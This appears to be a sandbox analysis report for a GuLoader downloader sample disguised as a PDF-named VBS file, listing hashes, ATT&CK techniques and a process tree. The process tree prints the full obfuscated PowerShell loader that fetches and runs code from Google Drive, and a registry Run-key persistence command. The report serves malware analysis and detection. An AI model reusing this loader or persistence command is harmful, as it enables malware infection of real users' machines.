guloader | 049feb6dcf68c869a98bf8fe7fe64434e8e27c18954a290094d636ac0bb2be23

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04-09-2024 08:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

VDF645425140·pdf.vbs
Size

25KB
MD5

f758726ca8e3639be7fb0ff04a7a8c4a
SHA1

14d882ba6389b41a57f012c409080d7d1e872ac7
SHA256

049feb6dcf68c869a98bf8fe7fe64434e8e27c18954a290094d636ac0bb2be23
SHA512

23961d2ad2057c002c69cb78a801f0b044752acd8cbbe9905aca11ef9ccea1149a8c211c893d71917589ad9d5e1ba2853df59a97b3824cafbcdee1060947124e
SSDEEP

384:iinVweRHN57gFx1JMhH1HxE2OUZrBclg0tMlDNtjwsLwi+eRrs+hNXusOKSqILB7:iiYgKXpDcqQo

Score

10^/10

guloader discovery downloader execution persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2300	powershell.exe
5	2300	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Tebbet = "%Nymarxister% -w 1 $Nonoxidation=(Get-ItemProperty -Path 'HKCU:\\Macerative\\').Semiquantitatively;%Nymarxister% ($Nonoxidation)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2300	powershell.exe
600	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
2	drive.google.com
3	drive.google.com
7	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1628	wab.exe
1628	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
600	powershell.exe
1628	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 600 set thread context of 1628	600	powershell.exe	36

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
860	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2300	powershell.exe
600	powershell.exe
600	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
600	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	600	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2856 wrote to memory of 2300	2856	WScript.exe	30
PID 2856 wrote to memory of 2300	2856	WScript.exe	30
PID 2856 wrote to memory of 2300	2856	WScript.exe	30
PID 2300 wrote to memory of 2756	2300	powershell.exe	32
PID 2300 wrote to memory of 2756	2300	powershell.exe	32
PID 2300 wrote to memory of 2756	2300	powershell.exe	32
PID 2300 wrote to memory of 600	2300	powershell.exe	34
PID 2300 wrote to memory of 600	2300	powershell.exe	34
PID 2300 wrote to memory of 600	2300	powershell.exe	34
PID 2300 wrote to memory of 600	2300	powershell.exe	34
PID 600 wrote to memory of 576	600	powershell.exe	35
PID 600 wrote to memory of 576	600	powershell.exe	35
PID 600 wrote to memory of 576	600	powershell.exe	35
PID 600 wrote to memory of 576	600	powershell.exe	35
PID 600 wrote to memory of 1628	600	powershell.exe	36
PID 600 wrote to memory of 1628	600	powershell.exe	36
PID 600 wrote to memory of 1628	600	powershell.exe	36
PID 600 wrote to memory of 1628	600	powershell.exe	36
PID 600 wrote to memory of 1628	600	powershell.exe	36
PID 600 wrote to memory of 1628	600	powershell.exe	36
PID 1628 wrote to memory of 3028	1628	wab.exe	38
PID 1628 wrote to memory of 3028	1628	wab.exe	38
PID 1628 wrote to memory of 3028	1628	wab.exe	38
PID 1628 wrote to memory of 3028	1628	wab.exe	38
PID 3028 wrote to memory of 860	3028	cmd.exe	40
PID 3028 wrote to memory of 860	3028	cmd.exe	40
PID 3028 wrote to memory of 860	3028	cmd.exe	40
PID 3028 wrote to memory of 860	3028	cmd.exe	40

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\VDF645425140·pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Fluoboride++;$Frothier+='subst';$Frothier+='r';}$Frothier+='ing';Function Incrassation($Tombing){$Comebacker=$Tombing.Length-$Fluoboride;For( $Unavailably=5;$Unavailably -lt $Comebacker;$Unavailably+=6){$Vertebrally+=$Tombing.$Frothier.'Invoke'( $Unavailably, $Fluoboride);}$Vertebrally;}function snedriver($Kurveoplsning){ & ($Fatsia) ($Kurveoplsning);}$Precipitantness=Incrassation ' NonrMSlurkoN nsezMaaleiSkandlAbsollD,horaBygge/Numme5Gage..,oged0Limni Ergo(Tsar.W maaiMinkan Non.dHideroVoyagwBismusUsher TilbaNSpg.lTTorni omp1Trans0Knuse.We.he0Poxal;An,st SpeedWT naciTilfinSlank6Bart.4T.ela;A.tid SubcexS nds6.eate4Trape; Tocc Over rChondvAmido:Proli1,uamf2 ,dda1Der i.Ea tl0Togst)Tilbu TartuG,erleeSkip,cForhjkHandeoEyesh/Semin2Creos0Skitt1Benzi0Inter0Agurk1 kaot0Bronc1Tegne LopseFPrecoiT.xinr Tey eLissif ClavoButl.xDrjde/Disin1Rust 2Pl.sm1Indhe.Kunds0 So i ';$Unavailablyndgivende=Incrassation ',striUKortksAn,lceOtiorrSvi.g- .nsvA.rerrgRefere P,renYperntSfyrb ';$Capriccioso233=Incrassation 'Afdanh PrimtAlairtMidmopSup rsPakis:,nqui/Pric./T ansdagnatrFo.ldi.olyfvFredheFilms.AutoogNo.bio P,ero Pre gGendalDuodeePersi.RevelcTrivsoYak,mm,emue/B uebuPacebcmanch?NrigsebarkexToftep UdjvoNoninrS,ffet .ent= Svand ApanoBesk,wLgnhantrs,nl DialoPyroaaTerridcombc&CentriTr midRe.rn=For a1Tvelye No,ibDiffe6.ridt-.rbli2PrimeDKretexPropei R.siA,ndviPArsen3 FibeZFasan9BisttMSa,amPSyns,P Skjoj R,ssMFadlsEOutdo7FastsiCocklO Glau4 DimeHPhysi4Une,tV BogmI.kannZProtilEfte UKursnf StosZb.lab ';$Transportfly=Incrassation 'overf>Reson ';$Fatsia=Incrassation 'Brnefi bet,e BiotxFresk ';$Ceiler='Licensaftale';$Virgulate = Incrassation ' tileTragtcNymphhRela,oMegap mulig%Albu,aAffinp innpDefskd Knita SalotTunkeaCompl%Aphot\AskorDM.lhiaCgi.gl helimWeldiaKlatrtFlammi.navnn T.lleCytodr .pernQuadreFremlsTomm .AssemS ForneAkkumlPolit lssen&Goodl&Divor dranke austcBrndehBurnsoAntit walbotHydro ';snedriver (Incrassation 'Kortg$ ConcgVrtsllSquibotnd nb SupeaPrev.lKonfe:Clo,eSEde.tuByttekDrankk InseeUlyk r UnqulPristaSledeg NeutePerpe= Berg( S.rec Alumm Pr,od cht Afsn/ Lipocfebri skibi$catalVSabini Troor Pan.gBrne,uMisealKollaa SwiltstalleSpeed) Ford ');snedriver (Incrassation 'Blegn$Chromg MilllNona oForvrbniddiaFl ppl Himm: BallFUnv tiKvadrs DulskAnetheGastrr.langiSendrsOp reaSemitmSymmelMystii SagsnBrun gUkamp=appel$Co,liCPad yaB.lanpOleocr Brooiwa soc pewycImboliPan.ioLifegsFritioEpig.2Dekag3,rfle3Forsk.GenfosHauntpD udglLangsiUrhantFordy(Slove$XenopTFasterDublea Sf,rnhandesPre.np Gym,oImiterP,rtutStyrefNonaflfiskeyIndda)Ama,r ');snedriver (Incrassation 'We,sm[AlyssNPed sepelomtErico.ObdorSOmstteFlan rAs.lrvBekeniMicrocGenneeSalvoP veroSmrokiBolo.n resttSinupMNavigaUneasnGangea ritig chopeNymferKita ] lit:Sprog:StoejSNonaneProjecStveku Ma rrC.aimiSwisstOmgreySne.rPCommarUdgruoTurm.tForhaoDw.rfc usinoIndsklPanes Baads=gyrop Bacil[IconoNKu.ineClacktYeast.ha.vtSEmusieDisu c FirkuAlminrHaandiVal ltAftegyBestsPV.elsrDwarfoHomoctPneumo PhotcDwaynoP,ojelBe,alTLampay,nudgp Photeflles],elic:Leann:Pr.klTHarcel KanjsRampi1Aarsk2Vinfl ');$Capriccioso233=$Fiskerisamling[0];$Rensdyrmossernes= (Incrassation 'Scutt$ Muddg,evgel,eltioS dsebfod,uaTheonlBukle: kreOUnd.fvKautieSkelerSemichS.urreDmperaDkketd Bouii CastnUsunde HedesHeli s Reko=HovedN Omste BoskwSynke- Trs.O D.spb UndejRaasteOldefc proutForf, forsnS JouryFluidsTilstt U tre,hevemBlods.lun rNR inteHypaltNatur.AverrWStanse SkanbJu,tiCAandel FumaiOpf.eeOliernStemmt');$Rensdyrmossernes+=$Sukkerlage[1];snedriver ($Rensdyrmossernes);snedriver (Incrassation 'Frban$Bil eO virkvTry beOpfanr til.hDecimeUdeeraDensadFibbei,odernMa.theDecumsKomm shexad.P rtiHsociaeBrutta MakrdJytteeBarrarMoralsSthen[Misf $KvabsUblgegnAfvejaSjaskvKalkua GkkeiAstril Mi,daf jltbKaliblBedd,yClotinForsvdSali.gEpi ai UorgvTro,pe UnwanSekredNon ceLa.na]Creir=Deva.$L ninPtyvstrSiam.eKonvecL.tasi KattpPrecoiAssimtDirigaTwinknTosprtMyrtanPrinte In,es CafesRever ');$Semihumbug=Incrassation 'Tunne$U scrOOlofav Pa,heKal.ur Karyh Da aeCrania Helld ntisi MultnSt,ise RespsFo,evsUopsi. S.lgD.oilsoI.praw ,lyanUnreslHusmooCas,oaSwea.d Ro uF OpgjiKast,lOctane F rp(Klema$ inglCSupera Datap EmorrDelfiiS.mmecBru ecSkraaiRabbioHjtudsFakt.oViki 2Ono.a3Tec.i3Hippu,Studi$In.brMC aniiBefr.xLnsyseLeiod)papir ';$Mixe=$Sukkerlage[0];snedriver (Incrassation 'Beewi$,oksegTas olDmkuro.ysteb Mispa Autelskriv:Tid.gNPa tioUnexpn Sspec Mum.hBulleaPackbl Musil nfuseEnchynJalougEp.kui Un.onWurligMario6 Fyri6En.os=L mpe(O,skiT alse,aryosExcavtres,r-LiturPRad oa e,opt.ldsshSneer Mast$FlunkM .avli OratxAfslaeKn al)Vinys ');while (!$Nonchallenging66) {snedriver (Incrassation 'Soute$Tryksg Tapel PrefoUnd,rbKautiaDemonlgarde: Di,tO SafirUfordg Intra SumpnG mmiepigg.tfustytfolkee Nest= ,eso$Uns ttTroldrStrm uHanoleCachi ') ;snedriver $Semihumbug;snedriver (Incrassation 'TommeSOverstEndotaCellur ErittUnmi,-StrudSDesinlbantue InteeGarnipCre a Tal,f4Reple ');snedriver (Incrassation ' Biof$H,drog MagnlSikkeoForhobDetaia,scarlOatla:NonprN.addooSistnnHyperc FinnhN.tmaaKlodslUnapplSpakeeTvrr nluftigampuliVand.nFict,g Ekst6Eldmo6Minel=T rea(NongeTPrecaeEsta,sEftert S.dd-grandP arlabah ctPh,tohSorbo Poin$DiarrM attriD,barxHydroeSupra)Annoy ') ;snedriver (Incrassation ' D,sa$Proang erfel VerboHyp.rb ramia Ld,alS erg:.naphIAnatonKra.tsHyperu SydalFrakka,edhot kspee,okard .eng=Falsu$ProvogBefollOrienoHjemtb ReriahalvrlNae,t:ObeliP SennuDisdetLng,eo,ortuuUnweitPol,rs Neur+ Strm+Map a%Mirac$ iltrFAmtski Gen.sOsculkKonseeElastrAssemiIndvis T,leaDietimCo,nelAlleri RingnStropgT lfa.H.nchcEx,teo NonvuFremfnNonfltCas i ') ;$Capriccioso233=$Fiskerisamling[$Insulated];}$Unmatching=321105;$Unavailablynequal=30275;snedriver (Incrassation 'Kuns $PlaisgP,isalMineroMon.mbBe teaBilfolSa,ir:BlseiBAnilirP,obli ShepgErotig Bdede.ilmurin.egnDeliketermis.usma Lieni=Gastr S inGTen neH,teltMarks-deltiCPrejuoReplenRetletAarsoelystsnMunketBlari ,alif$ TraiMOxybriVul ax HypeeKryp, ');snedriver (Incrassation ' Inds$ UtilgPos clTrimeoStenib nfroa DisplOpera:Vatt THewabrKommarSidese.yolfpHagerl RigoaFiloldG,gossB,gvieArgumrG.ydesOphol Taleh=Lgelf Lokal[StoleSTid,ky.dviksKphjttSk.vee jeldmBeami.HypodC disco Hu.onU kravPyopheSemicrorgant Ov.r]Junk.: H.ah:PressFUnr.grChorioBogmimPlattBScobbaStykvs InjueFad b6 Vest4A.ndsS NonrtAp,cerVinkeiInducnGgestgMutat(udvik$AllusBKob.er AcepiUnh.lgPinligSaftseEgiptrHavden snoreUn ers Past)Rocke ');snedriver (Incrassation 'Types$Miamig onpal JuraoBi.ekb.rtegaAborilTil i:P.ddlOUnsupp,ullelLo scaDdmangRoeoprTrifoeTredi Unfas=B.rse Geo o[UltraS ,gelyUnadesOutfatDu feeBerrtmBrand. elvhTbeniteEchinx alaet Dopi.CephaEPar.gnSearsc,lothoAkkomd Re,aiL,fornReusag Alpi]Lugni: Tu.k: Lb tACerioSOtalgCC,nfeIEkserIrulle.OxyneG SkibeGleamt.ynfrS BysstFestsr onariThem nDescogyapok(.uper$Pe sdT MemorWusserOpti.eSkrmbp SocilJunctaC,rtodRedaksDagtjeForldrNonsosGolde)Cathe ');snedriver (Incrassation '.ache$ Smaag.rotel ,rbeoMinigb O.thaSilvilFlydn:Unp aEKlipfx,eindt SynieUfor,rEvol.nLik fs Belih engeiBackppSkole1 Af e3 Moor1R,set=Diazo$KkkenOForlapportmlBroena G ougLillerV kseeRetab.Micros.dskiuSkidebBede.s Una.t Slagr ArkiiElemen BlokgNo.in(Cu li$TheorU RundnFortrm SpriaDrikktNorescsvarfhFugtiiLairmnHybrigMaili,Ox.de$ par UUnadonInhumaVersavNyttiaF.resi Flygl HuwpaPastob P.omlKa enyBestynR.afreVa grqBylanuStr paHobenl ka.u)Stjfo ');snedriver $Externship131;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dalmatinernes.Sel && echo t"
    3⤵
    PID:2756
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Fluoboride++;$Frothier+='subst';$Frothier+='r';}$Frothier+='ing';Function Incrassation($Tombing){$Comebacker=$Tombing.Length-$Fluoboride;For( $Unavailably=5;$Unavailably -lt $Comebacker;$Unavailably+=6){$Vertebrally+=$Tombing.$Frothier.'Invoke'( $Unavailably, $Fluoboride);}$Vertebrally;}function snedriver($Kurveoplsning){ & ($Fatsia) ($Kurveoplsning);}$Precipitantness=Incrassation ' NonrMSlurkoN nsezMaaleiSkandlAbsollD,horaBygge/Numme5Gage..,oged0Limni Ergo(Tsar.W maaiMinkan Non.dHideroVoyagwBismusUsher TilbaNSpg.lTTorni omp1Trans0Knuse.We.he0Poxal;An,st SpeedWT naciTilfinSlank6Bart.4T.ela;A.tid SubcexS nds6.eate4Trape; Tocc Over rChondvAmido:Proli1,uamf2 ,dda1Der i.Ea tl0Togst)Tilbu TartuG,erleeSkip,cForhjkHandeoEyesh/Semin2Creos0Skitt1Benzi0Inter0Agurk1 kaot0Bronc1Tegne LopseFPrecoiT.xinr Tey eLissif ClavoButl.xDrjde/Disin1Rust 2Pl.sm1Indhe.Kunds0 So i ';$Unavailablyndgivende=Incrassation ',striUKortksAn,lceOtiorrSvi.g- .nsvA.rerrgRefere P,renYperntSfyrb ';$Capriccioso233=Incrassation 'Afdanh PrimtAlairtMidmopSup rsPakis:,nqui/Pric./T ansdagnatrFo.ldi.olyfvFredheFilms.AutoogNo.bio P,ero Pre gGendalDuodeePersi.RevelcTrivsoYak,mm,emue/B uebuPacebcmanch?NrigsebarkexToftep UdjvoNoninrS,ffet .ent= Svand ApanoBesk,wLgnhantrs,nl DialoPyroaaTerridcombc&CentriTr midRe.rn=For a1Tvelye No,ibDiffe6.ridt-.rbli2PrimeDKretexPropei R.siA,ndviPArsen3 FibeZFasan9BisttMSa,amPSyns,P Skjoj R,ssMFadlsEOutdo7FastsiCocklO Glau4 DimeHPhysi4Une,tV BogmI.kannZProtilEfte UKursnf StosZb.lab ';$Transportfly=Incrassation 'overf>Reson ';$Fatsia=Incrassation 'Brnefi bet,e BiotxFresk ';$Ceiler='Licensaftale';$Virgulate = Incrassation ' tileTragtcNymphhRela,oMegap mulig%Albu,aAffinp innpDefskd Knita SalotTunkeaCompl%Aphot\AskorDM.lhiaCgi.gl helimWeldiaKlatrtFlammi.navnn T.lleCytodr .pernQuadreFremlsTomm .AssemS ForneAkkumlPolit lssen&Goodl&Divor dranke austcBrndehBurnsoAntit walbotHydro ';snedriver (Incrassation 'Kortg$ ConcgVrtsllSquibotnd nb SupeaPrev.lKonfe:Clo,eSEde.tuByttekDrankk InseeUlyk r UnqulPristaSledeg NeutePerpe= Berg( S.rec Alumm Pr,od cht Afsn/ Lipocfebri skibi$catalVSabini Troor Pan.gBrne,uMisealKollaa SwiltstalleSpeed) Ford ');snedriver (Incrassation 'Blegn$Chromg MilllNona oForvrbniddiaFl ppl Himm: BallFUnv tiKvadrs DulskAnetheGastrr.langiSendrsOp reaSemitmSymmelMystii SagsnBrun gUkamp=appel$Co,liCPad yaB.lanpOleocr Brooiwa soc pewycImboliPan.ioLifegsFritioEpig.2Dekag3,rfle3Forsk.GenfosHauntpD udglLangsiUrhantFordy(Slove$XenopTFasterDublea Sf,rnhandesPre.np Gym,oImiterP,rtutStyrefNonaflfiskeyIndda)Ama,r ');snedriver (Incrassation 'We,sm[AlyssNPed sepelomtErico.ObdorSOmstteFlan rAs.lrvBekeniMicrocGenneeSalvoP veroSmrokiBolo.n resttSinupMNavigaUneasnGangea ritig chopeNymferKita ] lit:Sprog:StoejSNonaneProjecStveku Ma rrC.aimiSwisstOmgreySne.rPCommarUdgruoTurm.tForhaoDw.rfc usinoIndsklPanes Baads=gyrop Bacil[IconoNKu.ineClacktYeast.ha.vtSEmusieDisu c FirkuAlminrHaandiVal ltAftegyBestsPV.elsrDwarfoHomoctPneumo PhotcDwaynoP,ojelBe,alTLampay,nudgp Photeflles],elic:Leann:Pr.klTHarcel KanjsRampi1Aarsk2Vinfl ');$Capriccioso233=$Fiskerisamling[0];$Rensdyrmossernes= (Incrassation 'Scutt$ Muddg,evgel,eltioS dsebfod,uaTheonlBukle: kreOUnd.fvKautieSkelerSemichS.urreDmperaDkketd Bouii CastnUsunde HedesHeli s Reko=HovedN Omste BoskwSynke- Trs.O D.spb UndejRaasteOldefc proutForf, forsnS JouryFluidsTilstt U tre,hevemBlods.lun rNR inteHypaltNatur.AverrWStanse SkanbJu,tiCAandel FumaiOpf.eeOliernStemmt');$Rensdyrmossernes+=$Sukkerlage[1];snedriver ($Rensdyrmossernes);snedriver (Incrassation 'Frban$Bil eO virkvTry beOpfanr til.hDecimeUdeeraDensadFibbei,odernMa.theDecumsKomm shexad.P rtiHsociaeBrutta MakrdJytteeBarrarMoralsSthen[Misf $KvabsUblgegnAfvejaSjaskvKalkua GkkeiAstril Mi,daf jltbKaliblBedd,yClotinForsvdSali.gEpi ai UorgvTro,pe UnwanSekredNon ceLa.na]Creir=Deva.$L ninPtyvstrSiam.eKonvecL.tasi KattpPrecoiAssimtDirigaTwinknTosprtMyrtanPrinte In,es CafesRever ');$Semihumbug=Incrassation 'Tunne$U scrOOlofav Pa,heKal.ur Karyh Da aeCrania Helld ntisi MultnSt,ise RespsFo,evsUopsi. S.lgD.oilsoI.praw ,lyanUnreslHusmooCas,oaSwea.d Ro uF OpgjiKast,lOctane F rp(Klema$ inglCSupera Datap EmorrDelfiiS.mmecBru ecSkraaiRabbioHjtudsFakt.oViki 2Ono.a3Tec.i3Hippu,Studi$In.brMC aniiBefr.xLnsyseLeiod)papir ';$Mixe=$Sukkerlage[0];snedriver (Incrassation 'Beewi$,oksegTas olDmkuro.ysteb Mispa Autelskriv:Tid.gNPa tioUnexpn Sspec Mum.hBulleaPackbl Musil nfuseEnchynJalougEp.kui Un.onWurligMario6 Fyri6En.os=L mpe(O,skiT alse,aryosExcavtres,r-LiturPRad oa e,opt.ldsshSneer Mast$FlunkM .avli OratxAfslaeKn al)Vinys ');while (!$Nonchallenging66) {snedriver (Incrassation 'Soute$Tryksg Tapel PrefoUnd,rbKautiaDemonlgarde: Di,tO SafirUfordg Intra SumpnG mmiepigg.tfustytfolkee Nest= ,eso$Uns ttTroldrStrm uHanoleCachi ') ;snedriver $Semihumbug;snedriver (Incrassation 'TommeSOverstEndotaCellur ErittUnmi,-StrudSDesinlbantue InteeGarnipCre a Tal,f4Reple ');snedriver (Incrassation ' Biof$H,drog MagnlSikkeoForhobDetaia,scarlOatla:NonprN.addooSistnnHyperc FinnhN.tmaaKlodslUnapplSpakeeTvrr nluftigampuliVand.nFict,g Ekst6Eldmo6Minel=T rea(NongeTPrecaeEsta,sEftert S.dd-grandP arlabah ctPh,tohSorbo Poin$DiarrM attriD,barxHydroeSupra)Annoy ') ;snedriver (Incrassation ' D,sa$Proang erfel VerboHyp.rb ramia Ld,alS erg:.naphIAnatonKra.tsHyperu SydalFrakka,edhot kspee,okard .eng=Falsu$ProvogBefollOrienoHjemtb ReriahalvrlNae,t:ObeliP SennuDisdetLng,eo,ortuuUnweitPol,rs Neur+ Strm+Map a%Mirac$ iltrFAmtski Gen.sOsculkKonseeElastrAssemiIndvis T,leaDietimCo,nelAlleri RingnStropgT lfa.H.nchcEx,teo NonvuFremfnNonfltCas i ') ;$Capriccioso233=$Fiskerisamling[$Insulated];}$Unmatching=321105;$Unavailablynequal=30275;snedriver (Incrassation 'Kuns $PlaisgP,isalMineroMon.mbBe teaBilfolSa,ir:BlseiBAnilirP,obli ShepgErotig Bdede.ilmurin.egnDeliketermis.usma Lieni=Gastr S inGTen neH,teltMarks-deltiCPrejuoReplenRetletAarsoelystsnMunketBlari ,alif$ TraiMOxybriVul ax HypeeKryp, ');snedriver (Incrassation ' Inds$ UtilgPos clTrimeoStenib nfroa DisplOpera:Vatt THewabrKommarSidese.yolfpHagerl RigoaFiloldG,gossB,gvieArgumrG.ydesOphol Taleh=Lgelf Lokal[StoleSTid,ky.dviksKphjttSk.vee jeldmBeami.HypodC disco Hu.onU kravPyopheSemicrorgant Ov.r]Junk.: H.ah:PressFUnr.grChorioBogmimPlattBScobbaStykvs InjueFad b6 Vest4A.ndsS NonrtAp,cerVinkeiInducnGgestgMutat(udvik$AllusBKob.er AcepiUnh.lgPinligSaftseEgiptrHavden snoreUn ers Past)Rocke ');snedriver (Incrassation 'Types$Miamig onpal JuraoBi.ekb.rtegaAborilTil i:P.ddlOUnsupp,ullelLo scaDdmangRoeoprTrifoeTredi Unfas=B.rse Geo o[UltraS ,gelyUnadesOutfatDu feeBerrtmBrand. elvhTbeniteEchinx alaet Dopi.CephaEPar.gnSearsc,lothoAkkomd Re,aiL,fornReusag Alpi]Lugni: Tu.k: Lb tACerioSOtalgCC,nfeIEkserIrulle.OxyneG SkibeGleamt.ynfrS BysstFestsr onariThem nDescogyapok(.uper$Pe sdT MemorWusserOpti.eSkrmbp SocilJunctaC,rtodRedaksDagtjeForldrNonsosGolde)Cathe ');snedriver (Incrassation '.ache$ Smaag.rotel ,rbeoMinigb O.thaSilvilFlydn:Unp aEKlipfx,eindt SynieUfor,rEvol.nLik fs Belih engeiBackppSkole1 Af e3 Moor1R,set=Diazo$KkkenOForlapportmlBroena G ougLillerV kseeRetab.Micros.dskiuSkidebBede.s Una.t Slagr ArkiiElemen BlokgNo.in(Cu li$TheorU RundnFortrm SpriaDrikktNorescsvarfhFugtiiLairmnHybrigMaili,Ox.de$ par UUnadonInhumaVersavNyttiaF.resi Flygl HuwpaPastob P.omlKa enyBestynR.afreVa grqBylanuStr paHobenl ka.u)Stjfo ');snedriver $Externship131;"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:600
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dalmatinernes.Sel && echo t"
      4⤵
      System Location Discovery: System Language Discovery
      PID:576
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1628
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tebbet" /t REG_EXPAND_SZ /d "%Nymarxister% -w 1 $Nonoxidation=(Get-ItemProperty -Path 'HKCU:\Macerative\').Semiquantitatively;%Nymarxister% ($Nonoxidation)"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3028
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tebbet" /t REG_EXPAND_SZ /d "%Nymarxister% -w 1 $Nonoxidation=(Get-ItemProperty -Path 'HKCU:\Macerative\').Semiquantitatively;%Nymarxister% ($Nonoxidation)"
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Dalmatinernes.Sel

Filesize
457KB

MD5
eaf0eec1825fc4c7702c0de998f46563

SHA1
1e52f255ff7538d76b9c23b4ca0019d2d6113f5e

SHA256
6fd56dfc09cbc965fa8ce3770653a75e9458cf9d4798c9d8675b89406187a981

SHA512
f36e354cdda4f6edbd02e634b9a6852e63c9f04c9396dc2a52b2f7f13791433db27f3670e9858e4b55402aaf902884df714008248ed2cfad6ecf47cf49520849

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\05I37L2T4ZUCP0S8NGVY.temp

Filesize
7KB

MD5
d3d7774934ed4e107a474c9017aa56f1

SHA1
bba6855788f40ab1ebe20ace4389acba59778f64

SHA256
dfa68245543f793aaca13b0d95465ef50ea210a9aface00747af882589d1c747

SHA512
b8171e410d0f792e7742e7cadc8d8e06b7c1a490c2cabc5bcb84bb09a1709808f77d9db7d1b755ef7e40ec555b339940464b390a4b9d695414f462623da470ea

Download Submit
memory/600-20-0x00000000065B0000-0x0000000009DDF000-memory.dmp

Filesize
56.2MB

Download
memory/1628-44-0x0000000001660000-0x0000000004E8F000-memory.dmp

Filesize
56.2MB

Download
memory/2300-13-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2300-8-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2300-10-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2300-11-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2300-4-0x000007FEF544E000-0x000007FEF544F000-memory.dmp

Filesize
4KB

Download
memory/2300-9-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2300-17-0x000007FEF544E000-0x000007FEF544F000-memory.dmp

Filesize
4KB

Download
memory/2300-7-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2300-19-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2300-6-0x00000000028F0000-0x00000000028F8000-memory.dmp

Filesize
32KB

Download
